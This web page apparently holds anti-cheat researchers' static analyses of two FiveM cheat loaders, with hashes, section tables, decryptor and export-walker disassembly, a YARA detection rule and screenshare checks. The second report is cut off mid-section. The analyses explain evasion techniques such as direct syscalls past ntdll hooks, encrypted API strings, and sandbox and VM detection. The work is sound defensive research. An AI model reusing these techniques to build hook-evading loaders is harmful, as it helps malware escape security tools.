PWNED on both counts — and both failures are elementary enough that neither can be attributed to sophisticated threat modeling gone wrong. These are beginner mistakes made by people who should not have been operating a paid security product in any capacity. --- # Wizard Bypass: ApateonDecoy Full Reversal & Detection | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 — updated Jun 6, 2026 Wizard Bypass: ApateonDecoy Full Reversal & Detection ===================================================== Complete static analysis of the Wizard FiveM bypass — internally named **ApateonDecoy / DecoyLoader** by developer **apx**. The binary embeds an unstripped PDB debug path, ships with hollowed standard PE sections, and stores its entire encrypted payload in a custom `.zyw` section reaching 7.82/8.0 entropy. HWID collection, COM proxy WMI queries, and sandbox timing evasion are all fingerprinted through the visible stub IAT alone. FiveMBypass DetectionYARAApateonDecoyCustom PackerHWID EnumerationAdmin RequiredAnti-DebugDirect Syscall Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. File Identity ------------- The sample is a 64-bit Windows GUI executable, 16.70 MB on disk. It circulates under arbitrary randomised filenames (no fixed distribution name). All hashes below are verified against the production sample. MD5`5d876d046d49eaa0fce206b334320f9d` SHA-1`7d21afb05a2511a59c21b614b5ec80d06eca53ec` SHA-256`9a868d89f0344ab7f1300300a0725244c5748d73151a604cea932f5717984978` Imphash`f5b335adf5038d9b21ece4ac984db11c` Authentihash`2dd7238ab0c4ee093d533b2fe57075407052cce9ce7f95c0687fc6d7fd804673` Rich PE hash`f29505b1b3695f6af1e6c55794f2ea21` * **Compiler:** Microsoft Visual C/C++ 19.36.35721 (Visual Studio 2022 v17.6), LTCG release build * **Linker:** Microsoft Linker 14.36.35721 * **Architecture:** PE32+ (x86-64), GUI subsystem * **Compile timestamp:** `0x69568ccb` → **2026-01-01 15:03:39 UTC** — New Year's Day, almost certainly manipulated * **Checksum:** `0x00000000` (zeroed — standard for tampered or tool-built PE files) * **SizeOfImage:** `0x01B29000` (28,606,464 bytes) — this value appears in Windows AppCompatCache/PcaSVC records alongside the file path and is a useful secondary indicator * **ASLR / DEP:** DYNAMIC\_BASE, HIGH\_ENTROPY\_VA, NX\_COMPAT all enabled * **Manifest:** `requireAdministrator` — UAC elevation is demanded on launch * **VT detections:** 51/70 at time of analysis; tagged `detect-debug-environment` Developer Intelligence — PDB Artifact ------------------------------------- The PE debug directory retains a full, unstripped CodeView RSDS entry. The developer never configured their release build to strip symbols. This single omission exposes the project name, directory layout, and local machine username. C:\\Users\\apx\\Downloads\\ApateonDecoy - Self\\ApateonDecoy - Self\\x64\\Release\\DecoyLoader.pdb * **Developer username:** `apx` — local Windows account on the build machine. * **Project name:** `ApateonDecoy` — the Visual Studio solution name. The word "Decoy" is intentional branding; the binary is designed to present a decoy surface to analysts while the real payload executes from the encrypted `.zyw` section. * **Sub-project:** `ApateonDecoy - Self` — the "Self" suffix suggests a self-injecting variant (as opposed to a separate loader targeting an external process). * **Output binary:** `DecoyLoader.exe` (renamed before distribution). * **Build config:** x64 Release (LTCG) — fully optimised, no debug info was supposed to ship. The PDB path leaked despite this because the developer did not set `/DEBUG:NONE` or strip the debug directory post-link. RSDS sig`52 53 44 53` PDB GUID`{6e6be30e-e46c-42b5-ba88-ad0df8fcbea5}` PDB age`11 (0x0B)` The GUID uniquely identifies this specific build. Future variants from the same solution will carry a different GUID but the same project path structure and `DecoyLoader.pdb` filename until the developer corrects their build pipeline. PE Section Analysis — Hollowed Standard Sections, Encrypted .zyw Payload ------------------------------------------------------------------------ Nine sections are declared in the section table. All four conventional MSVC sections — `.text`, `.rdata`, `.data`, and `.pdata` — have a virtual size of zero and carry no file data. Their headers exist solely to maintain the appearance of a normal PE layout for superficial scanners. All actual code, read-only data, and the import table reside in the custom `.zyw` section. | Section | Raw size | Entropy | Notes | | --- | --- | --- | --- | | .text | 0 bytes | — | Hollowed — header present, no content | | .rdata | 0 bytes | — | Hollowed — header present, no content | | .data | 0 bytes | — | Hollowed — header present, no content | | .pdata | 0 bytes | — | Hollowed — header present, no content | | .64X | 0 bytes | — | Hollow +RX section (10.1 MB virtual) — receives decrypted payload at runtime | | .3L9 | 3,072 B | 0.36 | IAT (FirstThunk array) for all 19 import DLL entries — receives resolved fn ptrs from loader | | .zyw | 17.5 MB | 7.82 | Encrypted payload — entry point at 47.3% offset (RVA 0x0125b7c9) | | .reloc | 512 B | 2.59 | Base relocation table — normal | | .rsrc | 512 B | 4.77 | Manifest (requireAdministrator) | The `.zyw` section records an entropy of **7.82 out of a theoretical maximum of 8.0** (measured: 7.8167). This is near-perfect randomness, consistent with AES-CBC, ChaCha20, or a strong stream cipher applied to the full payload. The encrypted region spans `0x010B0E00` bytes (17,501,696 raw). The binary's entry point (`RVA 0x0125B7C9`, file offset `0x007E67C9`) lands 47.3% into this section — deep inside the ciphertext. **CALL-slalom bootstrap:** The first instruction at the entry point is a forward `CALL +0x24B132` (to `RVA 0x014A6900`). At that landing site, another `CALL +0x06A5F9` fires (to `RVA 0x01510EFE`), which patches the return-address stack then calls the decryptor entry at `RVA 0x012D81AC`. This four-hop CALL-chain "slaloms" through the encrypted data, landing at 5-byte CALL windows embedded among the ciphertext. The actual decryption stub begins at the fourth hop. Everything between the CALL instructions is encrypted payload data that is never executed. Disassemblers produce garbage output for all bytes except the CALL opcodes. **.3L9 is the IAT (Import Address Table / FirstThunk array)** for all 19 imported DLLs. Its 3,072 bytes hold 19 sequentially-laid FirstThunk sub-arrays, each terminated by a zero QWORD. Pre-load values in .3L9 are hint/name RVAs pointing into _plaintext islands_ within .zyw where the import function names (e.g. `Sleep`, `MessageBoxW`, `CryptCreateHash`) are stored verbatim. The Windows loader reads those name strings, resolves the addresses, and overwrites .3L9 in place. The import directory itself (IDD at `RVA 0x01285F90`) and all OriginalFirstThunk arrays are also embedded inside .zyw — so the entire import subsystem lives inside the encrypted section, with .3L9 as the only small unencrypted landing pad. **OLEAUT32.dll!VariantInit** is imported by ordinal 8 (not by name) — a deliberate choice to reduce the number of readable API name strings. The CRT bridge DLLs (8 entries) are present but import only one function each, confirming these are MSVC runtime stubs, not direct calls from the payload. The **.64X** section (10.1 MB virtual, no raw data, Read+Execute) is the hollow landing zone. The decryption routine writes the real payload into .64X at runtime, then transfers control there. The CFG check function pointer in the Load Config directory (`RVA 0x014D8BD4`) also falls inside .zyw, reinforcing that the payload is not decrypted by the OS loader — the stub handles all fixups before CFG is involved. The section names `.3L9`, `.64X`, and `.zyw` are all non-standard and serve as reliable static indicators on their own. No legitimate software ships with these names. Import Analysis — Full IAT Recovered (19 Imported Libraries) ------------------------------------------------------------ Static analysis of the IAT embedded inside `.zyw` reveals 19 imported DLL records — KERNEL32.dll appears three times in separate IDD entries (Sleep alone, GetSystemTimeAsFileTime alone, and a six-function block), giving 8 KERNEL32 functions total. All remaining APIs are resolved at runtime via `GetProcAddress`; every function listed below is present in the static stub IAT. Dynamic resolution bootstrap * `KERNEL32.dll!LoadLibraryA` — load arbitrary DLLs at runtime * `KERNEL32.dll!GetProcAddress` — resolve any export by name without static import * `KERNEL32.dll!GetModuleHandleA` — locate already-loaded modules * `KERNEL32.dll!HeapAlloc` / `HeapFree` — direct heap management for unpacking buffers * `KERNEL32.dll!ExitProcess` — hard exit on detection or license failure These five APIs are sufficient to reconstruct the full Windows API surface at runtime. Every other call in the real payload is resolved this way, leaving no further trace in the static IAT. Sandbox / timing evasion * `KERNEL32.dll!Sleep` — timed delay to defeat sandbox time-acceleration analysis * `KERNEL32.dll!GetSystemTimeAsFileTime` — high-resolution timestamp for timing checks and seed generation HWID & system fingerprinting * `IPHLPAPI.DLL!GetAdaptersInfo` — enumerates network adapters to extract MAC addresses; MAC-based HWID generation * `ADVAPI32.dll!CryptCreateHash` — hashes collected hardware identifiers (SHA-1 or MD5 of MAC/volume serial) to produce a stable HWID token for license validation COM / WMI system query * `ole32.dll!CoSetProxyBlanket` — sets authentication level on a COM proxy; standard pattern before issuing WMI queries (Win32\_ComputerSystem, Win32\_BIOS) for VM/sandbox detection * `OLEAUT32.dll!VariantInit` — initialises VARIANT structures for WMI result parsing (named import, not ordinal) C2 / license check * `WININET.dll!InternetCloseHandle` — HTTP session teardown; presence confirms outbound HTTP; opening/request handles resolved dynamically via GetProcAddress User interaction * `USER32.dll!MessageBoxW` — modal dialog for license error, HWID mismatch, or ban notification C++ runtime (MSVCP140 / VCRUNTIME140 / CRT stubs) * `MSVCP140.dll!std::basic_ios::basic_ios()` — C++ iostream construction; confirms C++ STL usage for string/stream objects * `VCRUNTIME140_1.dll!__CxxFrameHandler4` / `VCRUNTIME140.dll!__current_exception_context` — C++ exception handling (SEH/EH4) * `api-ms-win-crt-*` (8 entries): `free`, `rand`, `__stdio_common_vsprintf_s`, `strlen`, `_time64`, `___lc_codepage_func`, `terminate`, `__setusermatherr` — CRT bridge stubs; `rand` + `_time64` together confirm time-seeded pseudo-random generation Entry Point & CALL-Slalom Bootstrap ----------------------------------- The entry point sits at **RVA 0x0125B7C9** (file offset `0x007E67C9`), 47.3% into the encrypted `.zyw` section. This is structurally distinct from conventional packers that place a decryptor stub in a separate small section. Here the bootstrap is woven into the ciphertext itself. **Execution chain (four confirmed hops):** Hop 0 — Entry point 0x14125B7C9 CALL +0x24B132 ; land at 0x1414A6900 followed by encrypted payload bytes (75 e2 29 ec 1f ...) — never executed Hop 1 — First trampoline 0x1414A6900 CALL +0x06A5F9 ; land at 0x141510EFE followed by CC (INT3) + encrypted bytes — the INT3 is padding, not reached Hop 2 — Return-address patch stub 0x141510EFE PUSHFQ ADD QWORD PTR \[RSP+0x10\], -0x4125B7CE ; patches EP return addr on stack CALL 0x1412D81AC ; Hop 3 — decryptor entry imm32 patches the Hop-0 return address; CALL-slalom stack now holds 3 layered ret addrs Hop 3 — Stack unwind + decryptor dispatch (RVA 0x012D81AC) 0x1412D81AC MOV \[RSP+0x18\], 0xFFFFFFFF\_A8217DEF ; sentinel PUSH \[RSP+8\] ; push Hop-1 retaddr as flag-data obfuscation POPFQ ; restore RFLAGS (discards Hop-1 retaddr) LEA RSP, \[RSP+0x18\] ; unwind entire CALL-slalom frame CALL 0x1416BC10C ; core decryptor (ROL/BSWAP/XOR loop) SYSCALL ; direct NT kernel call — bypasses ntdll hooks CALL 0x141253E11 ; post-decrypt continuation / fixup LEA RSP skips past the entire layered return-address frame built by hops 0–2 The core decryptor at **RVA 0x016BC10C** processes the payload DWORD-by-DWORD using a multi-step transform: each 4-byte word is XOR'd with a rolling key (r10d), negated, offset by constant `0x4AEECBF1`, rotated left 3 bits (`ROL ecx, 3`), then byte-swapped (`BSWAP ecx`) before being XOR'd into the output buffer. The decryptor body itself is obfuscated by a code virtualizer: after every ~40 real instructions, an indirect JMP transfers to a scattered code fragment at a discontiguous address (observed targets: `0x141ABA1E5`, `0x1418A883D`, `0x1418CE842`). This pattern defeats linear disassembly of the decryption loop and substantially raises the cost of manual decompilation. The CALL-slalom technique embeds 5-byte CALL instructions at specific offsets within the ciphertext. Each CALL pushes a return address onto the stack and jumps to the next hop. The surrounding bytes (garbage from encryption) are never executed. Disassemblers that do not follow the CALL chain output pure noise. After four hops, the stub uses `LEA RSP, [RSP+0x18]` to unwind the entire layered frame built by the CALL chain — no `GetModuleHandle` or image-base query is needed because the accumulated return addresses already encode the runtime load address. The **.3L9** section is the IAT — its pre-load QWORD values are hint/name RVAs into .zyw pointing to plaintext import name strings. First six entries (all terminator-separated, 16 bytes each): \[0x000\]0x012BD816KERNEL32!Sleeppre-res ptr → 'Sleep\\0' in .zyw \[0x010\]0x01274F7AUSER32!MessageBoxWpre-res ptr → 'MessageBoxW\\0' in .zyw \[0x020\]0x01308E46ADVAPI32!CryptCreateHashpre-res ptr → 'CryptCreateHash\\0' \[0x030\]0x014BBE6Cole32!CoSetProxyBlanketpre-res ptr → 'CoSetProxyBlanket\\0' \[0x040\]0x8000000000000008OLEAUT32!VariantInit (ord 8)ordinal import — no name string \[0x050\]0x01501480MSVCP140!basic\_ios::ctorpre-res ptr → mangled name in .zyw Anti-Analysis Behaviour ----------------------- VirusTotal's dynamic sandbox tags this binary with `detect-debug-environment`. Based on the import surface and binary structure, the following anti-analysis techniques are present or strongly implied: * **Encrypted payload (.zyw, entropy 7.82):** The entire real codebase is ciphertext at rest. Static disassembly of the binary produces only the decryption stub — the actual bypass logic is never visible without dynamic execution or key extraction. * **CALL-slalom bootstrap (four hops):** The entry point and three forward-trampoline CALLs are embedded inside the ciphertext. Standard disassemblers linearise from the EP and output garbage. Only a recursive CALL-following analysis reaches the decryptor. This defeats most static CFG-based scanners. * **Direct NT syscall (SYSCALL at RVA 0x012D81C4):** Immediately after calling the core decryptor in Hop 3, a bare `SYSCALL` instruction invokes the Windows kernel without going through `ntdll.dll`. EDR products and AV engines that hook userland APIs (`NtCreateSection`, `NtWriteVirtualMemory`, `NtResumeThread`) at the ntdll layer will not observe these calls. This is a tier-2 EDR-evasion technique. * **VM-obfuscated decryptor (code virtualizer at RVA 0x016BC10C):** The decryption loop body is run through a code virtualizer. Every ~40 real instructions, an indirect JMP transfers to a scattered code fragment at a discontiguous address. Observed dispatcher targets include `0x141ABA1E5`, `0x1418A883D`, and `0x1418CE842`. Decompilers produce incomplete output and the function cannot be meaningfully statically analysed without emulating the entire dispatcher chain. * **Debugger detection:** Confirmed by VT behavioral tag. Likely uses `IsDebuggerPresent`, `CheckRemoteDebuggerPresent`, or `NtQueryInformationProcess` (ProcessDebugPort), all resolved dynamically so they do not appear in the static IAT. * **Timing evasion via Sleep + GetSystemTimeAsFileTime:** Extended sleep delays defeat sandbox environments that time-accelerate execution. `GetSystemTimeAsFileTime` provides a high-resolution timestamp for timing delta checks (detect x100 time acceleration). * **VM / sandbox detection via CoSetProxyBlanket + WMI:** WMI queries to `Win32_ComputerSystem` and `Win32_BIOS` identify Hyper-V, VMware, VirtualBox, and sandboxie environments by manufacturer strings and BIOS version fields. The process exits cleanly if a virtual environment is detected. * **UAC elevation required:** The `requireAdministrator` manifest prevents execution in low-integrity analysis environments. Automated sandboxes running as standard user will trigger a UAC prompt and halt. * **Zeroed PE checksum:** The optional header checksum field is `0x00000000`. Windows does not enforce this for user-mode executables, but security tools that validate PE integrity can flag it as a tamper indicator. * **MEM\_NOT\_PAGED on .zyw (0x08000000 characteristic):** The encrypted payload section is marked non-pageable, keeping it in physical RAM and preventing it from being swapped to the pagefile. Memory-forensics tools that harvest pagefile data to find decrypted payloads will not find .zyw content there. This flag is normally used by kernel drivers — its presence in user-mode code is a hard anti-forensics indicator. * **No exports + hollow standard sections:** The binary exports nothing (no export directory) and has four hollow standard sections (`.text`, `.rdata`, `.data`, `.pdata`). Tools that inspect exports or standard section content return empty results. Timestamp Analysis — Fake New Year's Day Compile Date ----------------------------------------------------- The PE COFF header compile timestamp is `0x69568CCB`, which decodes to **2026-01-01 15:03:39 UTC**. A timestamp set to the first day of a calendar year is a near-universal indicator of deliberate manipulation — legitimate builds are distributed immediately after compilation, not held for an exact calendar boundary. This timestamp is stored in AppCompatCache (ShimCache) and the PCA/PcaSVC compatibility database alongside the executable's path and `SizeOfImage`. When reviewing AppCompat records, an investigator will see: Path: \\.exe Timestamp: 2026-01-01 15:03:39 SizeOfImage: 0x01B29000 The `SizeOfImage` value `0x01B29000` is the PE optional header field recording the total virtual size of the loaded image. It appears verbatim in PcaSVC/AppCompatCache records and serves as a complementary indicator — the combination of the round-date timestamp and this specific image size uniquely identifies the binary even if it has been renamed and the file deleted from disk. Treat any FiveM-adjacent executable with a PE timestamp on **2026-01-01** as a confirmed timestomping indicator. Escalate for full hash verification immediately. Primary IOCs & Detection Checklist ---------------------------------- 1 ### SHA-256 hash (definitive) Compute SHA-256 of any suspected binary. A match against `9a868d89f0344ab7f1300300a0725244c5748d73151a604cea932f5717984978` is definitive attribution regardless of filename or path. Additional hashes: MD5 `5d876d046d49eaa0fce206b334320f9d`, SHA-1 `7d21afb05a2511a59c21b614b5ec80d06eca53ec`. 2 ### Full PDB path in PE debug directory The complete string `C:\Users\apx\Downloads\ApateonDecoy - Self\ApateonDecoy - Self\x64\Release\DecoyLoader.pdb` is present in the CodeView RSDS debug entry (RSDS signature `52 53 44 53` at file offset `0x10ADC84`). Any hex editor, DIE, or `strings.exe` will surface it. This string cannot be removed without relinking the binary. 3 ### Three custom section names: .3L9, .64X, and .zyw Use a PE viewer or `dumpbin /headers` to inspect the section table. The combination of `.3L9` (IAT), `.64X` (hollow execution target), and `.zyw` (encrypted payload) is unique to this packer family. Any one alone is suspicious; all three together is definitive. The `.zyw` section entropy of **7.82/8.0** — near-maximum randomness — is immediately visible in any entropy-visualising tool (DIE, PEStudio, Binwalk). 4 ### PE compile timestamp 2026-01-01 In AppCompatCache or the raw PE COFF header (bytes 8–11 of the PE signature), the timestamp `0x69568CCB` decodes to New Year's Day 2026. Combined with the `SizeOfImage = 0x01B29000` stored in the same PcaSVC record, this uniquely identifies the binary in forensic artefacts even after the file has been removed from disk. 5 ### Imphash The import hash `f5b335adf5038d9b21ece4ac984db11c` covers only the visible stub IAT. Since all real imports are resolved dynamically, variants that share the same packing stub but differ in payload will produce the same imphash. This makes imphash useful for clustering builds from the same packer — not for variant differentiation. YARA Detection Rule ------------------- The rule below covers the current sample via three independent anchors: the full PDB developer path, the custom packer section names, and the PE compile timestamp. Any one of the first two conditions alone is sufficient for high-confidence detection. Requiring all three reduces false-positive risk to effectively zero. rule ApateonDecoy\_Wizard\_Bypass { meta: description = "Wizard FiveM bypass — ApateonDecoy/DecoyLoader by developer apx" author = "Clubhouse AC Research" date = "2026-06-06" sha256 = "9a868d89f0344ab7f1300300a0725244c5748d73151a604cea932f5717984978" imphash = "f5b335adf5038d9b21ece4ac984db11c" strings: // Full unstripped PDB path — structural, cannot be trivially patched $pdb\_full = "ApateonDecoy - Self\\x64\\Release\\DecoyLoader.pdb" ascii nocase // Short form — matches if full path is partially overwritten $pdb\_short = "DecoyLoader.pdb" ascii nocase // CodeView RSDS signature immediately before GUID+PDB path $rsds = { 52 53 44 53 } // Custom packer section names — non-standard, unique to this tool $sec\_zyw = ".zyw" ascii $sec\_3l9 = ".3L9" ascii $sec\_64x = ".64X" ascii // CALL-slalom bootstrap bytes at entry point (build-specific) // e8 32 b1 24 00 = CALL +0x24B132 into encrypted payload $ep\_call = { E8 32 B1 24 00 75 E2 } // PDB GUID bytes (CodeView RSDS entry — uniquely identifies this build) $pdb\_guid = { 0E E3 6B 6E 6C E4 B5 42 BA 88 AD 0D F8 FC BE A5 } // PE compile timestamp bytes (little-endian) at COFF offset 8 // 0x69568CCB = 2026-01-01 15:03:39 UTC $ts = { CB 8C 56 69 } condition: uint16(0) == 0x5A4D and // MZ header filesize > 15MB and // rules out stub/dropper variants ( $pdb\_full or ($pdb\_short and $rsds) or ($pdb\_guid) or ($sec\_zyw and $sec\_3l9 and $sec\_64x) ) } Add the `$ts` string to the condition as an additional optional anchor when hunting in forensic artefact corpuses where the file is not available for section-table inspection (e.g., prefetch imports, ShimCache entries, or MFT $DATA runs). Screenshare Check Methodology ----------------------------- 1 ### Locate the process by path anomaly Ask the player to open Process Explorer (Sysinternals) → View → Show Lower Pane → DLLs. Look for any GUI executable running outside of known software directories (Program Files, Steam, Epic, FiveM application data). The process will have a random filename but a UAC shield icon (it ran as administrator). Note the PID and full image path. 2 ### SHA-256 via PowerShell Run: `Get-FileHash "C:\path\to\file.exe" -Algorithm SHA256 | Select-Object Hash` in an elevated PowerShell window. Compare against `9a868d89f0344ab7f1300300a0725244c5748d73151a604cea932f5717984978`. 3 ### PDB string via Sysinternals Strings Run: `strings.exe -n 8 "path\to\file.exe" | findstr /i "ApateonDecoy"`. If the sample is present, the full developer path including `apx` username will appear immediately. This check takes under one second. 4 ### Section names via dumpbin or DIE Run `dumpbin /headers file.exe | findstr "Name"` or open the file in Detect-It-Easy. Presence of `.zyw` or `.3L9` in the section table is a standalone detection — no further checks required. 5 ### AppCompat timestamp review Open WinPrefetchView or System Informer's AppCompat panel. A PE compile timestamp of **2026-01-01** on any FiveM-adjacent executable is a confirmed timestomping indicator. Cross-reference the `SizeOfImage` in the same record against `0x01B29000` for positive identification. 6 ### Prefetch execution evidence Check `C:\Windows\Prefetch` for a prefetch file matching the executable name. Parse with WinPrefetchView — the module list will confirm whether WININET.dll and IPHLPAPI.dll were loaded, which is consistent with outbound C2 HTTP and MAC-based HWID collection. Detection Notes --------------- ApateonDecoy is an above-average effort in terms of payload protection — near-maximum-entropy encryption of the real code, hollowed standard sections, and dynamic API resolution prevent meaningful static reverse engineering of the bypass logic itself. However, the developer made a catastrophic OPSEC error by shipping with an unstripped PDB debug path, leaving the project name, binary name, and their own Windows username embedded in every distributed copy. The three detection anchors — full PDB path, custom section names, and New Year's Day PE timestamp — are independent. A future variant that strips the PDB will still expose `.zyw` and `.3L9`. A variant rebuilt with different section names will still carry the RSDS entry if the developer does not fix their build configuration. Only a full rebuild from a corrected project with proper strip flags, new section names, and a normalised timestamp would evade all three simultaneously. The YARA rule above is designed to remain valid through incremental evasion attempts. The `GetAdaptersInfo` + `CryptCreateHash` + `CoSetProxyBlanket` combination in the stub IAT fingerprints the HWID and VM-check subsystem regardless of payload encryption. Any binary presenting this exact three-API combination alongside `Sleep` and `InternetCloseHandle` in a minimal IAT should be treated as a strong behavioural candidate for this family even if hashes and section names have been rotated. --- # Notepad Bypass: fa817dc1 Full Reversal & Detection | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 6, 2026 Notepad Bypass: fa817dc1 Full Reversal & Detection ================================================== Complete static analysis of a FiveM bypass that poses as **notepad.exe**. The binary ships with six completely hollowed virtual PE sections and stores its entire encrypted payload in a custom `.tiko` section reaching **7.88/8.0 entropy**. A ROL-XOR decryption cipher with key `0x32063cae` decodes API strings at runtime, while the stub IAT reveals **NtQuerySystemInformation** anti-debug, **CPU affinity manipulation**, and **Terminal Services cross-session messaging**. No PDB path leaked — the developer stripped the debug directory. FiveMBypass DetectionYARACustom PackerROL-XOR CipherAnti-DebugCPU Affinity AbuseWTS Cross-SessionAdmin RequiredNo PDB Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. File Identity ------------- The sample is a 64-bit Windows PE executable, **4.90 MB on disk**, distributed under the filename `notepad.exe` to blend in with the legitimate Windows text editor. Despite the benign name, the binary has no relationship to Microsoft Notepad — it is a packed bypass loader with the **entire payload encrypted** inside a single custom section. MD5`340753116751ef6f5212667501a0e562` SHA-1`ad4d25b43964c1c54accdcbe97a3f2ca80d15894` SHA-256`b61907b9081bb5d7125264c5e60de013c02b7b866148248de603fb55f8d39a18` * **Architecture:** PE32+ (x86-64), subsystem 3 (Console) — despite the `notepad.exe` name, no GUI window is created by the stub; the real payload may spawn one * **Compile timestamp:** `0x6514b842` → **2023-09-27 23:18:26 UTC** — plausible; not zeroed or far-future, suggesting the developer did not manipulate it * **Checksum:** `0x00000000` (zeroed — standard for packed/modified PE files) * **SizeOfImage:** `0x0089F000` (9,109,504 bytes / ~8.7 MB) — the virtual footprint after all sections are mapped, significantly larger than the 4.9 MB on-disk file due to the six virtual sections that contain no file data but occupy address space; this value appears in Windows AppCompatCache and PcaSVC records alongside the file path and is a useful secondary indicator * **DllCharacteristics:** `0x8160` — DYNAMIC\_BASE (ASLR), HIGH\_ENTROPY\_VA, NX\_COMPAT (DEP), TERMINAL\_SERVER\_AWARE all set * **Manifest:** `requireAdministrator` — UAC elevation is demanded on launch * **Debug directory:** absent — no PDB path, no CodeView record. The developer stripped the debug directory before distribution, unlike the ApateonDecoy/Wizard sample which leaked a full PDB path * **Rich header:** not present — the DOS stub area contains no `Rich` marker, either stripped or never generated (uncommon for MSVC builds; may indicate use of a third-party linker or post-link PE manipulation) PE Section Analysis — Six Hollow Sections, Single Encrypted .tiko Payload ------------------------------------------------------------------------- Nine sections are declared in the section table. Six of them — `.gala`, `.xys23`, `.prom`, `.ax512`, `_gbit_`, and `.2024` — have a raw size of zero and contain no file data. Their virtual sizes and section headers exist solely to inflate the apparent complexity of the PE for superficial scanners. All executable code, decryption routines, and the encrypted real payload are consolidated into the single `.tiko` section. | Section | Virtual size | Raw size | Entropy | Notes | | --- | --- | --- | --- | --- | | .gala | 186 KB | 0 bytes | — | Hollowed CODE section — header only, no file data | | .xys23 | 101 KB | 0 bytes | — | Hollowed DATA section — header only | | .prom | 889 KB | 0 bytes | — | Hollowed RW DATA — largest virtual ghost section | | .ax512 | 10.7 KB | 0 bytes | — | Hollowed DATA section | | \_gbit\_ | 348 B | 0 bytes | — | Hollowed DATA section — underscore name unusual | | .2024 | 2.53 MB | 0 bytes | — | Hollowed CODE section — year-based name, no content | | .tiko | 4.99 MB | 4.90 MB | 7.88 | Entire encrypted payload + real IAT + stub code; EP here | | .limco | 224 B | 512 B | 2.10 | Base relocation / IAT pointer array — near-zero entropy | | .dino | 480 B | 512 B | 4.77 | Resource section — requireAdministrator manifest | The `.tiko` section records a Shannon entropy of **7.88 out of a theoretical maximum of 8.0**. This is near-perfect randomness, consistent with AES, ChaCha20, or a custom symmetric cipher applied to the entire payload before packing. Static string scanning of this region produces no readable plaintext or API names, ruling out simple XOR obfuscation applied to a plaintext binary. The binary's entry point (`RVA 0x3C4A87`, VA `0x1403C4A87`) lands inside `.tiko` at offset `0xEA87` (59 KB into the section, 1.2% of its size). The first executed instruction is `PUSH 0x19BAB67` — a seed constant passed to the root bootstrap function at `0x140853D23`. This is structurally different from the Wizard variant, which embeds its bootstrap at 47.3% into its `.zyw` section via a CALL-slalom chain. Section names `.tiko`, `.limco`, `.dino`, `.gala`, `.xys23`, `.prom`, `.ax512`, `_gbit_`, and `.2024` are all non-standard and constitute reliable static indicators — no legitimate software ships with this combination of section names. Structurally this binary belongs to the same packer family as [ApateonDecoy / Wizard bypass](https://clubhouseac.shop/research/wizard-bypass-detection) — both use a single high-entropy payload section, six or more hollowed virtual sections, identical dynamic API resolution logic via PE export table walking, and the same ROL-XOR decryption constant. The section names differ between samples, indicating the packer re-randomises names per build. Entry Point & Bootstrap Sequence -------------------------------- Ghidra headless analysis identifies 16 functions in the visible (non-encrypted) portion of the binary. The remaining code is unreachable until the runtime decryptor unpacks the payload into memory. The entry point at `0x1403C4A87` executes exactly three instructions before jumping to the main decryption bootstrap: 1403c4a87 PUSH 0x19bab67; bootstrap argument / seed 1403c4a8c CALL FUN\_140853d23; decryption + mapping routine 1403c4a91 JMPF 0xdbae:0x841dcc38; far jump — obfuscated flow The far jump (`JMPF`) after the call is deliberately placed but unreachable in practice —`FUN_140853d23` does not return in the normal case. This is a common obfuscation tactic to confuse linear-sweep disassemblers into following the wrong execution path. `FUN_140853d23` (108 bytes) is the root of the bootstrap chain. It sets up the decryption key, calls into `FUN_1407522af` (the 1,279-byte main resolver), and orchestrates mapping the decrypted payload before transferring control. The argument `0x19bab67` pushed before the call is used internally as an initial state value for the cipher or as a hash seed — it appears nowhere else in the stub and is not a valid Windows API ordinal. Decryption Engine — ROL-XOR Cipher with Key 0x32063cae ------------------------------------------------------ The core API-string and payload decryption cipher is implemented in `FUN_1407522af` (1,279 bytes) and reused verbatim in `FUN_140752798` (373 bytes). Both functions contain the identical decryption loop at different offsets. The cipher is a **position-dependent ROL-XOR** scheme: ; key init (position counter in ECX / EDI) MOV eax, 0x32063cae; constant key ROL eax, cl; rotate by position (0–7 bits) ADD al, dil; mix in position index low byte XOR al, byte ptr \[rdx+rbp\]; XOR against ciphertext byte MOV byte ptr \[rdx\], al; write plaintext in-place INC rbp; advance position counter The key `0x32063cae` appears at two independent call sites — once in `FUN_1407522af` at `0x140752502` and again in `FUN_140752798` at `0x1407527d9`. Its presence at both sites confirms it is the primary decryption constant and not a coincidental immediate value. This cipher decrypts **API name strings** on demand: rather than storing plaintext DLL and function names in readable memory, the stub stores them encrypted and decrypts each one immediately before calling `LoadLibraryA` or `GetProcAddress`. After the call resolves, the decrypted string may be re-encrypted or discarded. This prevents memory-scanning tools from locating hidden API names at rest. The loop iterates up to `0x104` (260) bytes per string — the maximum Windows API name length — and terminates at a null decrypted byte. The decrypted output lands in a stack buffer at `rsp+0x50` before being passed to `GetModuleHandleA` or `LoadLibraryA`. Dynamic API Resolution — PE Export Table Walk + Hash Comparison --------------------------------------------------------------- In addition to decrypting API names before passing them to `GetProcAddress`, the binary implements a **manual PE export table walker** in `FUN_1407522af`. This allows it to resolve exports from already-loaded modules without ever calling `GetProcAddress` — bypassing API-level hooks placed by EDR products. The walker sequence, confirmed by disassembly: ; validate MZ + PE signature MOV eax, 0x5A4D; 'MZ' CMP word ptr \[rcx\], ax MOVSXD rax, dword ptr \[rcx + 0x3c\]; e\_lfanew CMP dword ptr \[rax + rcx\], 0x4550; 'PE\\0\\0' ; load export directory MOV r8d, dword ptr \[rax + rcx + 0x88\]; export dir RVA (PE32+ offset) ; binary search over NumberOfNames LEA r11d, \[rax - 1\]; r11 = NumNames - 1 MOV ebx, edi; ebx = low = 0 ; mid = (low+high)/2 via SAR 1 SAR eax, 1 MOV r8d, dword ptr \[r9 + rax\*4\]; AddressOfNames\[mid\] The walker performs a **binary search** over the export name pointer array, comparing each candidate name against the decrypted target string one character at a time. When a match is found, it resolves the corresponding ordinal and function address. This technique completely avoids the hooked `GetProcAddress` entry point while still finding the correct function. When a module is not already loaded, the stub falls back to `LoadLibraryA` via the decrypted name path (call site at `0x1406131A7`), loads it, then re-enters the walk loop against the newly loaded DLL. The resolver recurses into itself (`CALL 0x1407522af` at `0x1407528D7`) to handle nested dependencies. Import Analysis — Stub IAT Reveals Intended Capabilities -------------------------------------------------------- The visible import table (located inside `.tiko`) contains 19 imports across five DLLs. This is the _minimum surface_ needed to bootstrap the runtime — every other API used by the real payload is resolved dynamically and leaves no trace in the static import table. Dynamic resolution bootstrap 